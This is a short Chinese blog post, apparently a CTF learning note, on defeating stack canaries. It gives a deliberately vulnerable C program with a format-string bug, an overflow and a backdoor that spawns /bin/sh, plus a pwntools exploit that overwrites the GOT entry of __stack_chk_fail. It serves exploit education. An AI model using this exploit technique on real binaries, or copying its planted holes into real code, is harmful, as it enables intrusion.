Canary--劫持__stack_chk_fail函数

Chiu Lv4
  2024-07-31 13:55:19 2024-07-31 13:55:19 Created   2024-07-31 13:56 2024-07-31 13:56 Updated    

canary 检测失败会调用 __stack_chk_fail 函数,可以通过比如格式化字符串漏洞修改 got 表中对应 __stack_chk_fail 的位置为后门函数的地址来实施攻击。

示例程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include<stdio.h>
#include<string.h>
#include <unistd.h>
#include <stdlib.h>
 
 
void backdoor() {
    puts("this is a backdoor.");
    system("/bin/sh");
}
 
void vuln() {
    char buf[0x100];
    puts("please input:");
    read(0, buf, 0x110);
    printf(buf);
}
 
int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
 
    vuln();
 
    return 0;
}
 
// gcc pwn.c -o pwn -no-pie -Wl,-z,lazy -g

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
 
elf = ELF("./pwn")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
p = process([elf.path])

#fmtstr_payload(offset, {write_address: write_value})
payload = fmtstr_payload(6, {elf.got['__stack_chk_fail']: elf.sym['backdoor']})
payload = payload.ljust(0x108, 'a')
payload += 'b'
# gdb.attach(p, "b *0x40124b\nc") #b *0x40124b\nc => 在printf下断点+continue,观察格式化字符串偏移
# pause()
 
p.sendafter("please input:", payload)
 
p.interactive()
  • Title: Canary--劫持__stack_chk_fail函数
  • Author: Chiu
  • Created at : 2024-07-31 13:55:19
  • Updated at : 2024-07-31 13:56:00
  • Link: https://github.com/Idealist17/github.io/2024/07/31/Canary-劫持-stack-chk-fail函数/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Canary--劫持__stack_chk_fail函数